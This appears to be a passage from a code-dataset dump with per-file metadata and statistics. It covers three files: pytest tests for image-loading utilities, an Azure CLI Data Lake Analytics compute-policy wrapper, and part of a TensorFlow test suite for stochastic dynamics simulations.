| 1,259
| 9,350
| 5.431295
| 0.080222
| 0.086868
| 0.084235
| 0.112314
| 0.943551
| 0.937555
| 0.93346
| 0.93346
| 0.908599
| 0.908599
| 0
| 0.014957
| 0.141925
| 9,350
| 240
| 94
| 38.958333
| 0.837343
| 0.045882
| 0
| 0.564935
| 0
| 0
| 0.104442
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006494
| false
| 0
| 0.006494
| 0.006494
| 0.844156
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
6f56ba885f6de123f528e9e7e43d9e47dacd0083
| 14,567
|
py
|
Python
|
ark/utils/load_utils_test.py
|
ngreenwald/segmentation
|
8bc87c2db96434a24194040f7ea754af2caf5e5f
|
[
"Apache-2.0"
] | 1
|
2020-01-15T22:23:41.000Z
|
2020-01-15T22:23:41.000Z
|
ark/utils/load_utils_test.py
|
ngreenwald/segmentation
|
8bc87c2db96434a24194040f7ea754af2caf5e5f
|
[
"Apache-2.0"
] | 103
|
2020-01-06T23:32:43.000Z
|
2020-08-14T04:42:00.000Z
|
ark/utils/load_utils_test.py
|
ngreenwald/segmentation
|
8bc87c2db96434a24194040f7ea754af2caf5e5f
|
[
"Apache-2.0"
] | 5
|
2020-02-21T14:00:20.000Z
|
2020-07-02T07:41:33.000Z
|
import numpy as np
import pytest
import tempfile
from ark.utils import load_utils, test_utils
def test_load_imgs_from_mibitiff():
# invalid directory is provided
with pytest.raises(ValueError):
loaded_xr = \
load_utils.load_imgs_from_mibitiff('not_a_dir', channels=None, delimiter='_')
with tempfile.TemporaryDirectory() as temp_dir:
# temp_dir contains no images
with pytest.raises(ValueError):
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
channels=None,
delimiter='_')
# config test environment
fovs, channels = test_utils.gen_fov_chan_names(num_fovs=2, num_chans=3, use_delimiter=True)
filelocs, data_xr = test_utils.create_paired_xarray_fovs(
temp_dir, fovs, channels, img_shape=(10, 10), mode='mibitiff', delimiter='_',
fills=True, dtype=np.float32
)
with pytest.raises(ValueError):
# attempt to pass an empty channels list
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
channels=[],
delimiter='_')
# check unspecified fov loading
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
channels=channels,
delimiter='_')
assert loaded_xr.equals(data_xr)
fovnames = [f'{fov}.tiff' for fov in fovs]
# check specified fov loading
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
mibitiff_files=[fovnames[-1]],
channels=channels,
delimiter='_')
assert loaded_xr.equals(data_xr.loc[[fovs[-1]], :, :, :])
# test automatic all channels loading
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
delimiter='_',
dtype=np.float32)
assert loaded_xr.equals(data_xr)
# test delimiter agnosticism
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
mibitiff_files=fovnames,
channels=channels,
delimiter='_',
dtype=np.float32)
assert loaded_xr.equals(data_xr)
assert np.issubdtype(loaded_xr.dtype, np.floating)
# test float overwrite
with pytest.warns(UserWarning):
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
mibitiff_files=[fovnames[-1]],
channels=channels,
delimiter='_',
dtype='int16')
assert loaded_xr.equals(data_xr.loc[[fovs[-1]], :, :, :])
assert np.issubdtype(loaded_xr.dtype, np.floating)
def test_load_imgs_from_tree():
# invalid directory is provided
with pytest.raises(ValueError):
loaded_xr = \
load_utils.load_imgs_from_tree('not_a_dir', img_sub_folder="TIFs", dtype="int16")
# test loading from within fov directories
with tempfile.TemporaryDirectory() as temp_dir:
# temp_dir contains no images
with pytest.raises(ValueError):
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16")
fovs, chans, imgs = test_utils.gen_fov_chan_names(num_fovs=3, num_chans=3,
return_imgs=True)
filelocs, data_xr = test_utils.create_paired_xarray_fovs(
temp_dir, fovs, chans, img_shape=(10, 10), delimiter='_', fills=True, sub_dir="TIFs",
dtype="int16"
)
with pytest.raises(ValueError):
# attempt to pass an empty channels list
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs",
dtype="int16", channels=[])
# check default loading of all files
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16")
assert loaded_xr.equals(data_xr)
# check loading of specific files
some_fovs = fovs[:2]
some_imgs = imgs[:2]
some_chans = chans[:2]
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16",
fovs=some_fovs, channels=some_imgs)
assert loaded_xr.equals(data_xr[:2, :, :, :2])
# check loading w/o file extension
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16",
channels=some_chans)
assert loaded_xr.equals(data_xr[:, :, :, :2])
# check mixed extension presence
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16",
channels=[chans[i] if i % 2 else imgs[i]
for i in range(3)])
assert loaded_xr.equals(data_xr)
# test loading with data_xr containing float values
with tempfile.TemporaryDirectory() as temp_dir:
fovs, chans, imgs = test_utils.gen_fov_chan_names(num_fovs=1, num_chans=2,
return_imgs=True)
filelocs, data_xr = test_utils.create_paired_xarray_fovs(
temp_dir, fovs, chans, img_shape=(10, 10), delimiter='_', fills=True, sub_dir="TIFs",
dtype=np.float32
)
with pytest.warns(UserWarning):
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16")
assert loaded_xr.equals(data_xr)
# test swap int16 -> float
assert np.issubdtype(loaded_xr.dtype, np.floating)
# test loading with variable sizes
with tempfile.TemporaryDirectory() as temp_dir:
fovs, chans, imgs = test_utils.gen_fov_chan_names(num_fovs=3, num_chans=3,
return_imgs=True)
filelocs, data_xr = test_utils.create_paired_xarray_fovs(
temp_dir, fovs, chans, img_shape=(10, 10), delimiter='_', fills=True, sub_dir="TIFs",
dtype="int16"
)
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16",
max_image_size=12)
assert loaded_xr.shape == (3, 12, 12, 3)
def test_load_imgs_from_dir():
# invalid directory is provided
with pytest.raises(ValueError):
loaded_xr = \
load_utils.load_imgs_from_dir('not_a_dir', trim_suffix='_', dtype=np.float32)
# test loading from 'free' directory
with tempfile.TemporaryDirectory() as temp_dir:
# input directory contains no images
with pytest.raises(ValueError):
load_utils.load_imgs_from_dir(temp_dir, trim_suffix='_', dtype=np.float32)
fovs, _ = test_utils.gen_fov_chan_names(num_fovs=3, num_chans=0, use_delimiter=True)
filelocs, data_xr = test_utils.create_paired_xarray_fovs(temp_dir, fovs, [0],
img_shape=(10, 10), mode='labels',
delimiter='_', dtype=np.float32)
# invalid list of files is provided
with pytest.raises(ValueError):
load_utils.load_imgs_from_dir(temp_dir, files=fovs + ['not_an_image'],
trim_suffix='_', dtype=np.float32)
with pytest.raises(ValueError):
load_utils.load_imgs_from_dir(temp_dir, files=['not_an_image'],
trim_suffix='_', dtype=np.float32)
# check default loading
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, trim_suffix='_',
xr_dim_name='compartments', dtype=np.float32)
assert loaded_xr.equals(data_xr)
# check suffix matched loading:
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, match_substring='_otherinfo',
trim_suffix='_', xr_dim_name='compartments',
dtype=np.float32)
assert loaded_xr.equals(data_xr.loc[['fov0'], :, :, :])
fovnames = [f'{fov}.tiff' for fov in fovs]
# check general substring matched loading
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, match_substring='ov', trim_suffix='_',
xr_dim_name='compartments', dtype=np.float32)
assert loaded_xr.equals(data_xr)
# check provided file overruling of match_substring
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, files=fovnames,
match_substring='_otherinfo', trim_suffix='_',
xr_dim_name='compartments', dtype=np.float32)
assert loaded_xr.equals(data_xr)
# test error on no matched suffix
with pytest.raises(ValueError):
load_utils.load_imgs_from_dir(temp_dir, match_substring='not_a_real_suffix',
trim_suffix='_', xr_dim_name='compartments',
dtype=np.float32)
# test swap float -> int16
with pytest.warns(UserWarning):
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, trim_suffix='_', force_ints=True,
xr_dim_name='compartments', dtype="int16")
assert loaded_xr.equals(data_xr)
assert loaded_xr.dtype == 'int16'
# test swap int16 -> float
with pytest.warns(UserWarning):
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, trim_suffix='_',
xr_dim_name='compartments', dtype="int16")
assert loaded_xr.equals(data_xr)
assert np.issubdtype(loaded_xr.dtype, np.floating)
# test multitiff input
with tempfile.TemporaryDirectory() as temp_dir:
fovs, channels = test_utils.gen_fov_chan_names(num_fovs=2, num_chans=3, use_delimiter=True)
filelocs, data_xr = test_utils.create_paired_xarray_fovs(
temp_dir, fovs, channels, img_shape=(10, 10), mode='reverse_multitiff', delimiter='_',
fills=True, dtype=np.float32
)
fovnames = [f'{fov}.tiff' for fov in fovs]
# test all channels loading w/ specified file
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, files=[fovnames[-1]],
xr_dim_name='channels', trim_suffix='_',
dtype=np.float32)
assert loaded_xr.equals(data_xr.loc[[fovs[-1]], :, :, :])
# indices should be between 0-2
with pytest.raises(ValueError):
load_utils.load_imgs_from_dir(temp_dir, files=[fovnames[-1]], xr_dim_name='channels',
trim_suffix='_', dtype=np.float32,
channel_indices=[0, 1, 4])
# xr_channel_names should contain 3 names (as there are 3 channels)
with pytest.raises(ValueError):
load_utils.load_imgs_from_dir(temp_dir, files=[fovnames[-1]], xr_dim_name='channels',
trim_suffix='_', dtype=np.float32,
xr_channel_names=['A', 'B'])
# test all channels w/ unspecified files + trim_suffix agnosticism
loaded_xr = load_utils.load_imgs_from_dir(temp_dir,
files=None,
channel_indices=None,
xr_dim_name='channels',
trim_suffix='_')
assert loaded_xr.equals(data_xr)
# test with specified channel_indices
loaded_xr = load_utils.load_imgs_from_dir(temp_dir,
files=None,
channel_indices=[0, 1, 2],
xr_dim_name='channels',
trim_suffix='_')
assert loaded_xr.equals(data_xr[:, :, :, :3])
# test channels_first input
fovs, channels = test_utils.gen_fov_chan_names(num_fovs=2, num_chans=5, use_delimiter=True)
_, data_xr = test_utils.create_paired_xarray_fovs(
temp_dir, fovs, channels, img_shape=(10, 10), mode='multitiff', delimiter='_',
fills=True, dtype=np.float32, channels_first=True
)
fovnames = [f'{fov}.tiff' for fov in fovs]
# test all channels loading w/ specified file
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, files=[fovnames[-1]],
xr_dim_name='channels', trim_suffix='_',
dtype=np.float32)
assert loaded_xr.equals(data_xr.loc[[fovs[-1]], :, :, :])
# test all channels w/ unspecified files + trim_suffix agnosticism
loaded_xr = load_utils.load_imgs_from_dir(temp_dir,
files=None,
channel_indices=None,
xr_dim_name='channels',
trim_suffix='_')
assert loaded_xr.equals(data_xr)
| 44.959877
| 99
| 0.527974
| 1,548
| 14,567
| 4.633721
| 0.100129
| 0.062456
| 0.063572
| 0.08295
| 0.842325
| 0.830894
| 0.815837
| 0.77722
| 0.758678
| 0.726195
| 0
| 0.017577
| 0.386833
| 14,567
| 323
| 100
| 45.099071
| 0.78549
| 0.095696
| 0
| 0.705882
| 0
| 0
| 0.035943
| 0
| 0
| 0
| 0
| 0
| 0.132353
| 1
| 0.014706
| false
| 0
| 0.019608
| 0
| 0.034314
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f5ebdf1c1eb17cb199aa7432267f4a08c815139
| 2,805
|
py
|
Python
|
pyaz/dla/account/compute_policy/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/dla/account/compute_policy/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/dla/account/compute_policy/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | 1
|
2022-02-03T09:12:01.000Z
|
2022-02-03T09:12:01.000Z
|
from .... pyaz_utils import _call_az
def create(account, compute_policy_name, object_id, object_type, max_dop_per_job=None, min_priority_per_job=None, resource_group=None):
'''
Create a compute policy in the Data Lake Analytics account.
Required Parameters:
- account -- Name of the Data Lake Analytics account.
- compute_policy_name -- None
- object_id -- None
- object_type -- None
Optional Parameters:
- max_dop_per_job -- None
- min_priority_per_job -- None
- resource_group -- If not specified, will attempt to discover the resource group for the specified Data Lake Analytics account.
'''
return _call_az("az dla account compute-policy create", locals())
def update(account, compute_policy_name, max_dop_per_job=None, min_priority_per_job=None, resource_group=None):
'''
Update a compute policy in the Data Lake Analytics account.
Required Parameters:
- account -- Name of the Data Lake Analytics account.
- compute_policy_name -- None
Optional Parameters:
- max_dop_per_job -- None
- min_priority_per_job -- None
- resource_group -- If not specified, will attempt to discover the resource group for the specified Data Lake Analytics account.
'''
return _call_az("az dla account compute-policy update", locals())
def list(account, resource_group=None):
'''
List compute policies in the a Lake Analytics account.
Required Parameters:
- account -- Name of the Data Lake Analytics account.
Optional Parameters:
- resource_group -- If not specified, will attempt to discover the resource group for the specified Data Lake Analytics account.
'''
return _call_az("az dla account compute-policy list", locals())
def show(account, compute_policy_name, resource_group=None):
'''
Retrieve a compute policy in a Data Lake Analytics account.
Required Parameters:
- account -- Name of the Data Lake Analytics account.
- compute_policy_name -- The name of the compute policy to retrieve.
Optional Parameters:
- resource_group -- If not specified, will attempt to discover the resource group for the specified Data Lake Analytics account.
'''
return _call_az("az dla account compute-policy show", locals())
def delete(account, compute_policy_name, resource_group=None):
'''
Delete a compute policy in a Data Lake Analytics account.
Required Parameters:
- account -- Name of the Data Lake Analytics account.
- compute_policy_name -- The name of the compute policy to delete.
Optional Parameters:
- resource_group -- If not specified, will attempt to discover the resource group for the specified Data Lake Analytics account.
'''
return _call_az("az dla account compute-policy delete", locals())
| 36.428571
| 135
| 0.724421
| 382
| 2,805
| 5.143979
| 0.133508
| 0.1257
| 0.152672
| 0.170992
| 0.847837
| 0.847837
| 0.847837
| 0.806107
| 0.806107
| 0.806107
| 0
| 0
| 0.202496
| 2,805
| 76
| 136
| 36.907895
| 0.878409
| 0.634225
| 0
| 0
| 0
| 0
| 0.212304
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.454545
| false
| 0
| 0.090909
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
48e147a4b3ac81a660da152290bbf87c6ddf9f6b
| 39,051
|
py
|
Python
|
simulation_research/tf_risk/dynamics_test.py
|
deepneuralmachine/google-research
|
d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231
|
[
"Apache-2.0"
] | 23,901
|
2018-10-04T19:48:53.000Z
|
2022-03-31T21:27:42.000Z
|
simulation_research/tf_risk/dynamics_test.py
|
deepneuralmachine/google-research
|
d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231
|
[
"Apache-2.0"
] | 891
|
2018-11-10T06:16:13.000Z
|
2022-03-31T10:42:34.000Z
|
simulation_research/tf_risk/dynamics_test.py
|
deepneuralmachine/google-research
|
d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231
|
[
"Apache-2.0"
] | 6,047
|
2018-10-12T06:31:02.000Z
|
2022-03-31T13:59:28.000Z
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for stochastic dynamics."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow.compat.v1 as tf # tf
from simulation_research.tf_risk import dynamics
from tensorflow.contrib import stateless as contrib_stateless
class DynamicsTest(tf.test.TestCase):
def assertAllDistinct(self, a, b):
self.assertEqual(a.shape, b.shape)
a = a.flatten()
b = b.flatten()
for i in range(len(a)):
self.assertNotEqual(a[i], b[i])
def test_antithetic_uniform_is_symmetrical(self):
shape = [512]
antithetic_uniform_samples = dynamics.random_antithetic_uniform(shape)
with self.session() as session:
[samples,
sym_samples] = session.run(tf.split(antithetic_uniform_samples, 2))
self.assertAllEqual(samples, 1.0 - sym_samples)
def test_antithetic_uniform_lowers_variance(self):
shape = [512]
num_trials = 128
key_ph = tf.placeholder(shape=(), dtype=tf.int32)
uniform_samples = dynamics.random_uniform(shape, key=key_ph)
antithetic_uniform_samples = dynamics.random_antithetic_uniform(
shape, key=key_ph)
mean_estimator = tf.reduce_mean(uniform_samples)
antithetic_mean_estimator = tf.reduce_mean(antithetic_uniform_samples)
mean_estimates = []
antithetic_mean_estimates = []
with self.session() as session:
for i in range(num_trials):
mean_estimates.append(
session.run(mean_estimator, feed_dict={key_ph: i}))
antithetic_mean_estimates.append(
session.run(antithetic_mean_estimator, feed_dict={key_ph: i}))
self.assertLessEqual(
np.std(antithetic_mean_estimates), np.std(mean_estimates))
def test_antithetic_normal_is_symmetrical(self):
shape = [512]
antithetic_normal_samples = dynamics.random_antithetic_normal(shape)
with self.session() as session:
[samples,
sym_samples] = session.run(tf.split(antithetic_normal_samples, 2))
self.assertAllEqual(samples, -sym_samples)
def test_antithetic_normal_lowers_variance(self):
shape = [512]
num_trials = 128
key_ph = tf.placeholder(shape=(), dtype=tf.int32)
normal_samples = dynamics.random_normal(shape, key=key_ph)
antithetic_normal_samples = dynamics.random_antithetic_normal(
shape, key=key_ph)
mean_estimator = tf.reduce_mean(normal_samples)
antithetic_mean_estimator = tf.reduce_mean(antithetic_normal_samples)
mean_estimates = []
antithetic_mean_estimates = []
with self.session() as session:
for i in range(num_trials):
mean_estimates.append(
session.run(mean_estimator, feed_dict={key_ph: i}))
antithetic_mean_estimates.append(
session.run(antithetic_mean_estimator, feed_dict={key_ph: i}))
self.assertLessEqual(
np.std(antithetic_mean_estimates), np.std(mean_estimates))
def test_gbm_euler_step_output_is_correct(self):
np.random.seed(0)
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
states = tf.ones([num_samples])
eps_t = np.ndarray.astype(
np.random.normal(size=[num_samples]), dtype=np.float32)
next_states = dynamics.gbm_euler_step(
states, drift, vol, t, dt, random_normal_op=lambda: eps_t)
with self.session() as session:
next_states_eval = session.run(next_states)
self.assertEqual(next_states_eval.shape, (num_samples,))
# Here the maximum discrepancy is 1.17e-7 due to differences in
# numerical implementations between tf and np so we set delta to 1.2e-7.
self.assertAllClose(
next_states_eval,
np.ones([num_samples], dtype=np.float32) *
(1.0 + drift * dt + vol * eps_t * np.sqrt(dt)),
atol=1.2e-7)
def test_gbm_euler_step_expects_static_shape(self):
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
states = tf.placeholder(dtype=tf.float32, shape=[None])
with self.assertRaises(ValueError):
dynamics.gbm_euler_step(states, drift, vol, t, dt)
def test_gbm_euler_step_is_deterministic(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key = 1337
states = tf.ones([num_samples])
eps_t = contrib_stateless.stateless_random_normal(
shape=[num_samples], seed=[key, int(t / dt)])
next_states = dynamics.gbm_euler_step(
states, drift, vol, t, dt, random_normal_op=lambda: eps_t)
next_states_bis = dynamics.gbm_euler_step(
states, drift, vol, t, dt, key=key)
with self.session() as session:
next_states_eval, next_states_bis_eval = session.run((next_states,
next_states_bis))
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_states_bis_eval.shape, (num_samples,))
self.assertAllClose(next_states_eval, next_states_bis_eval, atol=1e-7)
def test_gbm_euler_step_output_changes_with_t(self):
drift = 0.2
vol = 0.1
t_0 = 0.2
dt = 0.01
num_samples = 8
t_1 = t_0 + dt
states = tf.ones([num_samples])
next_states_0 = dynamics.gbm_euler_step(states, drift, vol, t_0, dt)
next_states_1 = dynamics.gbm_euler_step(states, drift, vol, t_1, dt)
with self.session() as session:
next_states_0_eval, next_states_1_eval = session.run((next_states_0,
next_states_1))
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_output_changes_with_key(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key_0 = 74
key_1 = 75
states = tf.ones([num_samples])
next_states_0 = dynamics.gbm_euler_step(
states, drift, vol, t, dt, key=key_0)
next_states_1 = dynamics.gbm_euler_step(
states, drift, vol, t, dt, key=key_1)
with self.session() as session:
next_states_0_eval, next_states_1_eval = session.run((next_states_0,
next_states_1))
# The step is a bijection w.r.t. dw_t, all terms should be different.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_running_max_output_is_correct(self):
np.random.seed(0)
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
initial_states = np.ones([num_samples], dtype=np.float32)
states_and_max = [tf.constant(initial_states)] * 2
eps_t = np.ndarray.astype(
np.random.normal(size=[num_samples]), dtype=np.float32)
(next_states, next_max) = dynamics.gbm_euler_step_running_max(
states_and_max,
drift,
vol,
t,
dt,
simulate_bridge=False,
random_normal_op=lambda: eps_t)
with self.session() as session:
(next_states_eval, next_max_eval) = session.run((next_states, next_max))
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_max_eval.shape, (num_samples,))
expected_next_states = initial_states * (1.0 + drift * dt +
vol * eps_t * np.sqrt(dt))
expected_next_max = np.maximum(expected_next_states, initial_states)
# Here the maximum discrepancy is 1.17e-7 due to differences in
# numerical implementations between tf and np so we set delta to 1.2e-7.
self.assertAllClose(
next_states_eval, expected_next_states, atol=1.2e-7)
self.assertAllClose(next_max_eval, expected_next_max, atol=1.2e-7)
def test_gbm_euler_step_running_max_is_deterministic(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key = 1337
states_and_max = [tf.ones([num_samples])] * 2
eps_t = contrib_stateless.stateless_random_normal(
shape=[num_samples], seed=[key, int(t / dt)])
next_states_and_max = dynamics.gbm_euler_step_running_max(
states_and_max,
drift,
vol,
t,
dt,
simulate_bridge=False,
random_normal_op=lambda: eps_t)
next_states_and_max_bis = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t, dt, simulate_bridge=False, key=key)
with self.session() as session:
next_states_and_max_eval, next_states_and_max_bis_eval = session.run(
(next_states_and_max, next_states_and_max_bis))
next_states_eval, next_max_eval = next_states_and_max_eval
next_states_bis_eval, next_max_bis_eval = next_states_and_max_bis_eval
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_states_bis_eval.shape, (num_samples,))
self.assertEqual(next_max_eval.shape, (num_samples,))
self.assertEqual(next_max_bis_eval.shape, (num_samples,))
self.assertAllClose(next_states_eval, next_states_bis_eval)
self.assertAllClose(next_max_eval, next_max_bis_eval)
def test_gbm_euler_step_running_max_expects_static_shape_left_member(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
states_and_max = [
tf.placeholder(dtype=tf.float32, shape=[None]), tf.ones([num_samples])]
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_running_max(states_and_max, drift, vol, t, dt)
def test_gbm_euler_step_running_max_expects_static_shape_right_member(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
states_and_max = [
tf.ones([num_samples]), tf.placeholder(dtype=tf.float32, shape=[None])]
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_running_max(states_and_max, drift, vol, t, dt)
def test_gbm_euler_step_running_max_expects_static_shape_both_members(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
states_and_max = [
tf.placeholder(dtype=tf.float32, shape=[None]),
tf.placeholder(dtype=tf.float32, shape=[None])]
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_running_max(states_and_max, drift, vol, t, dt)
def test_gbm_euler_step_running_max_changes_with_t(self):
drift = 0.2
vol = 0.1
t_0 = 0.2
dt = 0.01
num_samples = 8
t_1 = t_0 + dt
states_and_max = [tf.ones([num_samples])] * 2
next_states_and_max_0 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t_0, dt, simulate_bridge=False)
next_states_and_max_1 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t_1, dt, simulate_bridge=False)
with self.session() as session:
next_states_and_max_0_eval, next_states_and_max_1_eval = session.run(
(next_states_and_max_0, next_states_and_max_1))
next_states_0_eval, next_max_0_eval = next_states_and_max_0_eval
next_states_1_eval, next_max_1_eval = next_states_and_max_1_eval
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
self.assertEqual(next_max_0_eval.shape, (num_samples,))
self.assertEqual(next_max_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
# However there is no such guarantee for the running maxima.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_running_max_changes_with_key(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key_0 = 74
key_1 = 75
states_and_max = [tf.ones([num_samples])] * 2
next_states_and_max_0 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t, dt, key=key_0, simulate_bridge=False)
next_states_and_max_1 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t, dt, key=key_1, simulate_bridge=False)
with self.session() as session:
next_states_and_max_0_eval, next_states_and_max_1_eval = session.run(
(next_states_and_max_0, next_states_and_max_1))
next_states_0_eval, next_max_0_eval = next_states_and_max_0_eval
next_states_1_eval, next_max_1_eval = next_states_and_max_1_eval
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
self.assertEqual(next_max_0_eval.shape, (num_samples,))
self.assertEqual(next_max_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
# However there is no such guarantee for the running maxima.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_running_max_bridge_output_is_correct(self):
np.random.seed(0)
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
initial_states = np.ones([num_samples], dtype=np.float32)
states_and_max = [tf.constant(initial_states)] * 2
eps_t = np.ndarray.astype(
np.random.normal(size=[num_samples]), dtype=np.float32)
u_t = np.ndarray.astype(
np.random.uniform(size=[num_samples]), dtype=np.float32)
(next_states, next_max) = dynamics.gbm_euler_step_running_max(
states_and_max,
drift,
vol,
t,
dt,
simulate_bridge=True,
random_normal_op=lambda: eps_t,
random_uniform_op=lambda: u_t)
with self.session() as session:
(next_states_eval, next_max_eval) = session.run((next_states, next_max))
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_max_eval.shape, (num_samples,))
expected_next_states = initial_states * (1.0 + drift * dt +
vol * eps_t * np.sqrt(dt))
expected_bridge_max = 0.5 * (
initial_states + expected_next_states +
np.sqrt((initial_states - expected_next_states)**2 - 2.0 * dt *
(vol * initial_states)**2 * np.log(u_t)))
expected_next_max = np.maximum(expected_next_states, expected_bridge_max)
# Here the maximum discrepancy is 1.17e-7 due to differences in
# numerical implementations between tf and np so we set delta to 1.2e-7.
self.assertAllClose(
next_states_eval, expected_next_states, atol=1.2e-7)
self.assertAllClose(next_max_eval, expected_next_max, atol=1.2e-7)
def test_gbm_euler_step_running_max_bridge_is_deterministic(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key = 1337
states_and_max = [tf.ones([num_samples])] * 2
eps_t = contrib_stateless.stateless_random_normal(
shape=[num_samples], seed=[2 * key, int(t / dt)])
u_t = contrib_stateless.stateless_random_uniform(
shape=[num_samples], seed=[2 * key + 1, int(t / dt)])
next_states_and_max = dynamics.gbm_euler_step_running_max(
states_and_max,
drift,
vol,
t,
dt,
simulate_bridge=True,
random_normal_op=lambda: eps_t,
random_uniform_op=lambda: u_t)
next_states_and_max_bis = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t, dt, simulate_bridge=True, key=key)
with self.session() as session:
next_states_and_max_eval, next_states_and_max_bis_eval = session.run(
(next_states_and_max, next_states_and_max_bis))
next_states_eval, next_max_eval = next_states_and_max_eval
next_states_bis_eval, next_max_bis_eval = next_states_and_max_bis_eval
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_states_bis_eval.shape, (num_samples,))
self.assertEqual(next_max_eval.shape, (num_samples,))
